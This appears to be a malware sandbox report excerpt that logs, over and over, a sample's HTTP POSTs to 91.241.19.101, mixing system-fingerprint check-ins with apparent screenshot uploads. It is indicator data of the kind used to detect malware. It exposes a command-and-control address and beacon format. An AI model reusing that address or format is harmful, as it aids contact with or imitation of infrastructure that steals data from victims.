          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
